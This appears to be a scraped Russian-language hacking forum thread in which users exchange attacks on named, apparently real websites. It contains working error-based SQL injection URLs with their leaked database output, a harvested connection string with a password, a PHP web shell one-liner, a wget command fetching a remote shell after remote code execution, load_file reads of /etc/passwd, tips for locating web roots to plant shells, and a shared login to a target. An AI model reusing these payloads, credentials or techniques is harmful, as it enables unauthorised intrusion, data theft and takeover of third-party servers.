It's all very simple _http://www.nudeafrica.com/hotThread/getHotThread.php?a=nudeafrica&c=2&b=1%22and(select(1)from(select(count(*)),concat((select(version())from(information_schema.tables)limit/**/0,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and%22 Duplicate entry '5.0.95' for key 1 Error no:1062
В web.config нашел такую строчку <add name="ConnectionString" connectionString="Data Source=serv;Persist Security Info=True;User ID=Report;Password=bigem;" providerName="System.Data.OracleClient"/> Как подключится? Я так понял через клиент oracle, если да то где скачать клиент и как подключится?
Есть сайт mysql для которого установлен на другом сервере, к нему есть доступ. Можно ли залить как ни будь шелл через него?
Нашел сайт с RCE. Ввожу: wget http://site.ru/shell.php Выдает: С curl'ом такая же проблема. Если написать просто wget: Остальные команды (rm\ls -la\etc) выполняет нормально. Могу создавать файлы. Правда если: echo <?php system($_GET[cmd]); ?> > 1.php то: 500 Internal Server Error
Code: ls -al /tmp/ Fatal error: Allowed memory size of 50331648 bytes exhausted (tried to allocate 700 bytes) В аську отписал.
Есть инъекция, file_priv=y. Как можно узнать абсолютный путь к сайту, при условии, что вывод ошибок отключен, в httpd.conf отсылка типа Include "/etc/httpd/vhosts/*.conf", а угадать *.conf не получается? Логи не открываются, видимо, нет прав на чтение.
Нет, тоже не помогает. Отсылка на /home/username/, а мои сайты находятся/var/www/html/дальше не знаю/ ЗЫ Почему-то при написании в адресной строке браузера load_file('/etc/passwd') сайт подвисает, а если захексить - то все норм. И такое на всех сайтах и всех основных браузерах...
подскажите, это инъекция? в конце fid (пробелы убрать) если да, то как от туда данные вытащить? пробовал, не получается
дальше и на угад можно, ведь не такуж и много вариантов, советую почитать http://mh-proxy.ru/blog/index.php?mod=read&id=15 PHP: http://onlineracer.softgames.de/softgames/mobile/index_softgames.php?token=8EFCF9FAD3B2A421038C4CE2FB2DC0C7&sig=D8849E4E00B50E2E120D56366B072D1E&api_id=2446802&referrer=user_apps&method=getenemygarage&fid=1+and%28select*from%28select%28name_const%28version%28%29,1%29%29,name_const%28version%28%29,1%29%29a%29and%281%29=%201 column name '5.1.63-0+squeeze1-log''
1)Попробуй /etc/httpd/vhosts/default.conf /etc/httpd/vhosts/(домен).conf 2)Прогони сканером директорий на стандартные пути к файлу с phpinfo(); (часто оставляют в корне web директории что-нибудь типа info.php, phpinfo.php, 1.php, и так далее) . там можно будет прочитать путь. 3) Посмотри что еще за сайты на сервере (можно здесь http://madnet.name/tools/madss/ ), спровоцируй ошибку на других доменах, так же попробуй найти на них пхпинфо, по шаблону подобрать путь к основной жертве.
Кто может раскрутить это не блайндом а чтобы вывод был нормальный ? Там походу какойто фильтр на union Для авторизации [email protected]:123456